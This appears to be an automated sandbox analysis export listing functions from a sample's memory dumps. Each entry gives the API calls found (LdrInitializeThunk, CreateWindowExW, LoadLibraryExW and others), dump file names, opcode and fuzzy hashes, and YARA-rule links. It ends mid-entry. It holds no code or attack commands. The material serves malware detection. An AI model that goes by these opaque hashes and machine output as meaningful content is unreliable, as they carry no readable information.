Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 859b5748a9f85fa17f3d31d1afab39bc895649509a5574962e3bbae3f37e2ef4
Instruction ID: 1eedac51447f2b12e5bfe08f0e4145db7cd49fc8e7a5a7eb651767bb5f452254
Opcode Fuzzy Hash: 859b5748a9f85fa17f3d31d1afab39bc895649509a5574962e3bbae3f37e2ef4
Instruction Fuzzy Hash: 17120A75A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47119, Relevance: 1.9, APIs: 1, Instructions: 437libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c26611b73c6baba7f94ac275e31c1479a83f5795e431430dc2c1248d79a01fa
Instruction ID: d6dfb50a191bb78950120d7b5c93a3c16cd1cdd399261fe7e4c0dfd63c1fd1c5
Opcode Fuzzy Hash: 2c26611b73c6baba7f94ac275e31c1479a83f5795e431430dc2c1248d79a01fa
Instruction Fuzzy Hash: 871209B5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47163, Relevance: 1.9, APIs: 1, Instructions: 430libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80385c5ae2964bed47a24c2faca9e6adccc1bbcd4ac805c1322ed02746363fa2
Instruction ID: 81871944c316704312ce2519dd42e468373fef9e6dfb924a9f8126c1638e2282
Opcode Fuzzy Hash: 80385c5ae2964bed47a24c2faca9e6adccc1bbcd4ac805c1322ed02746363fa2
Instruction Fuzzy Hash: 96120AB5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C471AD, Relevance: 1.9, APIs: 1, Instructions: 423libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e50021418c345990944cbfc8ad471be7c67413c3ac330207c4942025d2d94da
Instruction ID: b0050170dae3e3c1700dfd40f2e09cc6a95b206bf821e5034b9e3a3c533cd3f9
Opcode Fuzzy Hash: 0e50021418c345990944cbfc8ad471be7c67413c3ac330207c4942025d2d94da
Instruction Fuzzy Hash: 00120AB5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C471F7, Relevance: 1.9, APIs: 1, Instructions: 416libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07201aa8d2fa474ee19a5bbd55858a899f213a87d9a0ab6cb923eb18a2987b37
Instruction ID: 825b8f089926bb32b44b7172391855580c874fffbeac24a42ca3312f2a8ba56a
Opcode Fuzzy Hash: 07201aa8d2fa474ee19a5bbd55858a899f213a87d9a0ab6cb923eb18a2987b37
Instruction Fuzzy Hash: 5A121BB5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47241, Relevance: 1.9, APIs: 1, Instructions: 409libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdd68fa75cbd34371c750d069ba89b25cab20e5728a3b0f298a02aa3d12018d2
Instruction ID: 50c6d83e9098758830753b0bf87c836a44d571e5320cb6dfa4a790960f17b697
Opcode Fuzzy Hash: cdd68fa75cbd34371c750d069ba89b25cab20e5728a3b0f298a02aa3d12018d2
Instruction Fuzzy Hash: CC020BB5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C4728B, Relevance: 1.9, APIs: 1, Instructions: 402libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81dc81acfd8d71e68a32757a484de1f27f765bfa34cdab49f8bd989153fa98ba
Instruction ID: 5052ebb6ba09b5671d73064aa9dc4ca970326ff25ccff728e817e3870f6b0249
Opcode Fuzzy Hash: 81dc81acfd8d71e68a32757a484de1f27f765bfa34cdab49f8bd989153fa98ba
Instruction Fuzzy Hash: 75020CB5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C472D5, Relevance: 1.9, APIs: 1, Instructions: 395libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcf920bb9269d71e4d0dae33067c0df46ad6ab9439bc48d41958297806f3ecdb
Instruction ID: cb7b21c12569a5f8c1929c89b8df3dd0857f01ed4a8a73a0eae4479ac073227f
Opcode Fuzzy Hash: bcf920bb9269d71e4d0dae33067c0df46ad6ab9439bc48d41958297806f3ecdb
Instruction Fuzzy Hash: 85021CB5A05224CFDB64DF70C898B9DB7B6BF88305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47335, Relevance: 1.9, APIs: 1, Instructions: 384libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b03721d21edf1e23bf048e2e037942dd675becbd0b5812ad2730746c5dbace2
Instruction ID: 09baaa1949a61f42aa2aa71b0306cb892b39a80cb661eca92e62f4d1b4b21855
Opcode Fuzzy Hash: 2b03721d21edf1e23bf048e2e037942dd675becbd0b5812ad2730746c5dbace2
Instruction Fuzzy Hash: D2021CB5A09224CFDB54DF70C898B9DB7B6BF88305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C4737F, Relevance: 1.9, APIs: 1, Instructions: 377libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a984f99b828a6ceb8bb13c711a879fd492392093e4d5510744f036c19303ee23
Instruction ID: 4a0df9570242d7a06c320e33af3a415bceedeebac0421b7e835616fc4ad87bf5
Opcode Fuzzy Hash: a984f99b828a6ceb8bb13c711a879fd492392093e4d5510744f036c19303ee23
Instruction Fuzzy Hash: 46F11CB5A09224CFDB54DF70C898B9DB7B6BF88305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C473C9, Relevance: 1.9, APIs: 1, Instructions: 368libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff39181ba40f0abce93a89f0953712f943d6f132825732a7a23be332d5d6a191
Instruction ID: 1cae489e1d44cbe732bd0762804e8b187fa557a50bc1e1d6b1b9a1082168f4f6
Opcode Fuzzy Hash: ff39181ba40f0abce93a89f0953712f943d6f132825732a7a23be332d5d6a191
Instruction Fuzzy Hash: E2F11CB5A052248FDB54DF70C898B9DB7B6BF88305F2181EAD50AE3244DB349E81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00C47407, Relevance: 1.9, APIs: 1, Instructions: 363libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b67cffa5131c2b996f7263855207f0601c5d00ec858e0af326e85c4a3366892
Instruction ID: c90ef934ee9db3c0afd597a44c84706ece1ac3f57cfbf112540e6408e9193873
Opcode Fuzzy Hash: 8b67cffa5131c2b996f7263855207f0601c5d00ec858e0af326e85c4a3366892
Instruction Fuzzy Hash: EEF11BB5A052248FDB54DF70C898B9DB7B6BF88305F1181EAD50AE3244DB349E81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00C47451, Relevance: 1.9, APIs: 1, Instructions: 356libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2c7ff7652df7b12312843bd68229804cace552b21a921748d9163d9ce473eae
Instruction ID: ccf2a3c19e64a2066e1d5ba6969a0f7734f2712d3080188a4484767e4c03c0ff
Opcode Fuzzy Hash: c2c7ff7652df7b12312843bd68229804cace552b21a921748d9163d9ce473eae
Instruction Fuzzy Hash: 6FF11BB5A052248FDB54DF70C898B9DB7B6BF88305F1181AAD50AE3344DB349E81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00C4749B, Relevance: 1.8, APIs: 1, Instructions: 349libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f99115ddc5454ed5f191483ded94fb340ad939b2b511323c1972f34edbb1707
Instruction ID: cb1533aacda3648000ec33036d5cbfe66b1d88e3ec1d58ff547ac9b55d9f1a73
Opcode Fuzzy Hash: 5f99115ddc5454ed5f191483ded94fb340ad939b2b511323c1972f34edbb1707
Instruction Fuzzy Hash: C3F11B75A052248FDB54DF74C898B9DB7B6BF88305F1181AAD50AE3344DB349E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C474E5, Relevance: 1.8, APIs: 1, Instructions: 342libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: afbf27119484133e7bc9cc45ccf3ec5e74c72cdcd0f73b031fc00fc063b11743
Instruction ID: cbc0850208426f7d7c35d8f6c3935f1527834a8f2302dc400960eca1d4ff9e6f
Opcode Fuzzy Hash: afbf27119484133e7bc9cc45ccf3ec5e74c72cdcd0f73b031fc00fc063b11743
Instruction Fuzzy Hash: FBE11A75A052248FDB64DF74C898B9DB7B6BF88305F2181AAD50AE3344DB349E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C4752F, Relevance: 1.8, APIs: 1, Instructions: 335libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9f58310d5235058a1ea5be5f958c21535b40f759b4271bce80e4a0d09e3c143
Instruction ID: 8267e30625796a85dd30bb1f75e76be6c3db494b072707631a1b6560b5fd9547
Opcode Fuzzy Hash: f9f58310d5235058a1ea5be5f958c21535b40f759b4271bce80e4a0d09e3c143
Instruction Fuzzy Hash: 88E11975A052248FDB64DF70C898B9DB7B6BF88305F2181AAD50AE3344DB349E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C47579, Relevance: 1.8, APIs: 1, Instructions: 328libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d08700b779a4ec00ecd22da71d73ba46e3b48d701a2ff61336776cee76cff2c
Instruction ID: 63c07050e293f34147f313a4fd645c753a3afa02e3e9993800750330d0670d1e
Opcode Fuzzy Hash: 3d08700b779a4ec00ecd22da71d73ba46e3b48d701a2ff61336776cee76cff2c
Instruction Fuzzy Hash: 8EE11975A052248FDB64DB70CC98B9DB7B6BF88305F1181AAD50AE3244DB389E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C475C3, Relevance: 1.8, APIs: 1, Instructions: 321libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 735e8ed37f5c09cad3b6d8c0c2a8bb86b5b476c79797de1843ba371bc684c576
Instruction ID: 8c56ae9db5e62c4ad61fed771bc054f047e190a42f028187d229f5a8749d3fe6
Opcode Fuzzy Hash: 735e8ed37f5c09cad3b6d8c0c2a8bb86b5b476c79797de1843ba371bc684c576
Instruction Fuzzy Hash: 8CD11975A052248FDB64DB70CC98BADB7B6BF88305F1181AAD50BE3244DB349E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0139A040, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0139A081

Memory Dump Source

Source File: 0000001B.00000002.5626982607.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea805241c23cf8b1d8b1d005e1dde33c2c80918a223cbd5b8e21e2a72167e206
Instruction ID: 34e1ed3d058c2c6509706d9a3da2777581e23b3238cfb8bdb8b5993fc3214353
Opcode Fuzzy Hash: ea805241c23cf8b1d8b1d005e1dde33c2c80918a223cbd5b8e21e2a72167e206
Instruction Fuzzy Hash: C6618075A00219DBDF14DFB4C889BAEBBF2AF48345F118528E502A7390DF39A941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DCE4A08, Relevance: 1.7, APIs: 1, Instructions: 156COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCE690A

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3dbe680a8734c9ce9cae8085c9ef950711808c4f8235c352dfc30fe697fe1ff3
Instruction ID: 13549b83eb53c6e43313cbab3d7e65a9c584e272ff23998356070809cb5cc91c
Opcode Fuzzy Hash: 3dbe680a8734c9ce9cae8085c9ef950711808c4f8235c352dfc30fe697fe1ff3
Instruction Fuzzy Hash: 3A5154B1C053489FCB01CFAAC890ACEBFB5AF49314F25855BE454AB212D774A845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 01397820, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01397881

Memory Dump Source

Source File: 0000001B.00000002.5626982607.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49bdc7f5b7f25fae3c34f178f80f159e9f72617df9073078bfe032ac5784dd55
Instruction ID: 5090cf5b0b00bea69e4e446c6ddfc73e3b445739baf126836965f1fa09f15e6b
Opcode Fuzzy Hash: 49bdc7f5b7f25fae3c34f178f80f159e9f72617df9073078bfe032ac5784dd55
Instruction Fuzzy Hash: A8517575A142059BCB04EFB4C899AAEB7F5FF88214B158969E5039B391DF70AC04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01397818, Relevance: 1.6, APIs: 1, Instructions: 141libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01397881

Memory Dump Source

Source File: 0000001B.00000002.5626982607.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ebbac17b43bb7e71b72f103ce3792fa7bff6e59860a5871d6112bdc49edee81
Instruction ID: 91c53d19e308ab54e92045f21aea8916f00f3206ec7f68a410db2ed113f82b4b
Opcode Fuzzy Hash: 6ebbac17b43bb7e71b72f103ce3792fa7bff6e59860a5871d6112bdc49edee81
Instruction Fuzzy Hash: B951A531B142049FDB04EFB4C889AAE77F5FF88214F158969E5039B291DB70AC04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DCE67ED, Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCE690A

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 12f2e0133cd3c4236541c0df2978d25fb87bb0e8116c169dfadf5a578bd0f9a7
Instruction ID: cb57376c037fc20ec1f131109bf70056c635274128fc80e6aef8611d9699f499
Opcode Fuzzy Hash: 12f2e0133cd3c4236541c0df2978d25fb87bb0e8116c169dfadf5a578bd0f9a7
Instruction Fuzzy Hash: 0E51C1B1D10209DFDF14CFA9C884ADDBFB5BF88350F21862AE819AB210D775A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DCE4A7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCE690A

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: abf6f7e688aceff1c1818e72e66a637e13972de2af19899643fd9ea50df7d3b1
Instruction ID: d1bbd1b16607b0081c8849dea6615297f45abbc2663c6505334d4e8719a1d6b4
Opcode Fuzzy Hash: abf6f7e688aceff1c1818e72e66a637e13972de2af19899643fd9ea50df7d3b1
Instruction Fuzzy Hash: 5751B0B1D1020DDFDB14CF9AC884ADEBFB5BF48350F21852AE819AB210D775A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DCEA144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1DCEB4E1

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 19b1891f89fd01703cbfb25fba8c06716cd6b8be229362437db1cdd9b2812839
Instruction ID: ede09f4550f9b696f785d4d277fceb09cc68767a053b1f45a46fd54d9dc797f7
Opcode Fuzzy Hash: 19b1891f89fd01703cbfb25fba8c06716cd6b8be229362437db1cdd9b2812839
Instruction Fuzzy Hash: C5415BB4900209CFDB10CF95C484AAAFBF6FF89314F24C959E519AB321D774A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DCEA54A, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DCEA5D7

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4fc3ec68fd47c4329ad51df9f5ac326319bfdb0713215fa3b1e6cbb6cf0164b
Instruction ID: 0e56f8a8676d2d3eec27dcd9e7320f8d6ee5440f3490d447a81b3811c9727318
Opcode Fuzzy Hash: d4fc3ec68fd47c4329ad51df9f5ac326319bfdb0713215fa3b1e6cbb6cf0164b
Instruction Fuzzy Hash: 5E21D2B59012089FDB10CFAAD984ADEBBF8EB48310F20841AE955A3310D374AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0139A034, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0139A081

Memory Dump Source

Source File: 0000001B.00000002.5626982607.0000000001390000.00000040.00000010.sdmp, Offset: 01390000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee6df18e2c9ac9d974a6881f308b2864ef0523238d8519a2879c9f6a9c0dd6cd
Instruction ID: b7c7854161c47a5610eee6450a6d28cc5627a49bbf90223ae3baf60cbb7b4d16
Opcode Fuzzy Hash: ee6df18e2c9ac9d974a6881f308b2864ef0523238d8519a2879c9f6a9c0dd6cd
Instruction Fuzzy Hash: 9421AF70A05219DFDF14DFB4C484AADBBB2FF89305F118668E002AB395CB369885CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DCEA550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DCEA5D7

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fd21b6f71e0f793964b371a347fff900e9fe2a67d53f1a393c8ea362b71a0bba
Instruction ID: 9842da2847d1610f0a0b6837c24be1f45eeafb64dc28d47f8a307dffd053cd80
Opcode Fuzzy Hash: fd21b6f71e0f793964b371a347fff900e9fe2a67d53f1a393c8ea362b71a0bba
Instruction Fuzzy Hash: A021E3B5D012089FDB10CFAAD984ADEFBF8EF48310F10841AE915A3210D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2BB8, Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00CA2B99,00000800), ref: 00CA2C2A

Memory Dump Source

Source File: 0000001B.00000002.5621924120.0000000000CA0000.00000040.00000010.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7e6ea664b69261c582e4308c0bcb7626c8c794c241185a76d17908f0436cb0f3
Instruction ID: 28ed1a19e3a96ed2eeb5d234115bbd358821892305ea627ad0ffc81355ebcc95
Opcode Fuzzy Hash: 7e6ea664b69261c582e4308c0bcb7626c8c794c241185a76d17908f0436cb0f3
Instruction Fuzzy Hash: 482138B6D002099FDB10CF9AC444BDEFBF4AF89328F15842ED919A7600C375A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1E64, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00CA2B99,00000800), ref: 00CA2C2A

Memory Dump Source

Source File: 0000001B.00000002.5621924120.0000000000CA0000.00000040.00000010.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 143ec525912f9d3146c6de01641d266984ca028c8f128a6efd5f3e87bfc47245
Instruction ID: b04a0f587336af115874d7d6cb9f40c8faad9edf86f06b17e97958c29738ee33
Opcode Fuzzy Hash: 143ec525912f9d3146c6de01641d266984ca028c8f128a6efd5f3e87bfc47245
Instruction Fuzzy Hash: CC11E7B5D002199FDB10CFAAD444BDEFBF4AB89314F11846ED515A7600C375AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DCE37C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DCE57B6

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 392ac638f017eeb1077647fb48fdaaa54dc128b42450309839c7c9bef79f4ef5
Instruction ID: 036528b4d6174b39667c182f452d55d767fc303bacbaedd1415b1a39ccd4ce00
Opcode Fuzzy Hash: 392ac638f017eeb1077647fb48fdaaa54dc128b42450309839c7c9bef79f4ef5
Instruction Fuzzy Hash: 311132B5C10209CFCB10CF9AC444BDEFBF8AF88214F11886AD929B7200D378A504CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 1DCE5749, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DCE57B6

Memory Dump Source

Source File: 0000001B.00000002.5638666891.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e711632bb2661717d1b96b4186341e92f2a5a107b99d5221822a8020ac1d62b1
Instruction ID: a7606e398ba4f9239e448a551a9912d500bbd6dd2382ce6a1456fb10a43cd56e
Opcode Fuzzy Hash: e711632bb2661717d1b96b4186341e92f2a5a107b99d5221822a8020ac1d62b1
Instruction Fuzzy Hash: F61102B6C102098FDB10CF9AC444BDEFBF9AF89714F11892AD429B7600D379A545CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5A68, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00CA68D5

Memory Dump Source

Source File: 0000001B.00000002.5621924120.0000000000CA0000.00000040.00000010.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bf39e9fd295d4e91b855ab68b6df243d17d096918981cfa86aa89b9df600fe0e
Instruction ID: e685714c27774c3e9318398779745d24e93c41b2eb4215bf7d7e90495b6de92c
Opcode Fuzzy Hash: bf39e9fd295d4e91b855ab68b6df243d17d096918981cfa86aa89b9df600fe0e
Instruction Fuzzy Hash: BB1106B1D002498FCB20CF9AD548BDEFBF8AB49314F24845AD559A7240D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CA687F, Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00CA68D5

Memory Dump Source

Source File: 0000001B.00000002.5621924120.0000000000CA0000.00000040.00000010.sdmp, Offset: 00CA0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 70259425737c8c624454b5b040428f95bde5558edff5a89d4d006c4993fb9e97
Instruction ID: 68768f0a9e453539580389dd3d103b3657f99b27eeabf13985b0ae4dafe0bce4
Opcode Fuzzy Hash: 70259425737c8c624454b5b040428f95bde5558edff5a89d4d006c4993fb9e97
Instruction Fuzzy Hash: 671115B5D002498FCB10CFA9D548BDEFBF4AF89314F24845AD559A7640C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DB1D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.5637859676.000000001DB1D000.00000040.00000001.sdmp, Offset: 1DB1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c830d3069b4a20f48f70857728ae4f534dec46a06791950bee15e4e2dc1cb3c6
Instruction ID: 26bf923d223598cf268e10a90935b467a0a78a4ccb6fdbc717216d797f350321
Opcode Fuzzy Hash: c830d3069b4a20f48f70857728ae4f534dec46a06791950bee15e4e2dc1cb3c6
Instruction Fuzzy Hash: A0212B75504244DFDB01DF58E9C0F16BB65FB88B24F20C569D90A0F20AC336E456CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 1DB1D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

